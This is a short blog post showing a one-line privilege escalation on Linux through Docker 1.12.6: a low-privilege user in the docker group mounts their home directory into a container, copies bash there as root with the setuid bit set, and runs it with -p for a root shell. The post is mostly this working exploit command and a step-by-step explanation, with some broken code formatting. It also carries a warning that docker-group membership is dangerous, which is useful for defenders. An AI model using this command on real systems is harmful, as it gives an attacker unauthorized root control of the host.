One-Liner Linux Privilege Escalation with Docker 1.12.6

I just came up with this on my own, got excited, then saw this this technique has
been around for a couple years already, but what the hell? I already wrote the post,
so here you go:

A common step during the docker installation process is to add a user to the “docker”
group so that they can run containers without sudo-ing. People have warned that this
is dangerous. They are correct.

If an attacker pops your box and is on a low priv account BUT that account can run
docker containers, the attacker can perform a privilege escalation attack on Linux
using docker trivially. Like so:

1
$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

Screenshot of Linux Privilege Escalation with Docker

GAME OVER

What’s going on here?

When you run a docker container, things run as root INSIDE that container.
So the line:

1
cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;

is run as root inside the container. So you get a copy of a suid-enabled bash
saved into /h_docs INSIDE the container.

/h_docs is of course mapped to a directory on your host file system, so you could
find it using

inspect``` but to make things easy, we map the volume to
1
2
3
4
5
6
our low-priv user's home directory.

That where this part of the ```docker run``` command comes from:

```bash
-v /home/${USER}:/h_docs

After the container finished running the command you will find a lovely new
suid-enabled, executable file in the home directory called rootshell.

Screenshot of ls -a ~/rootshell

Then bypass the normal suid script blockers by running with the -p flag
and you are golden.

Once again:

Screenshot of Linux Privilege Escalation with Docker

Share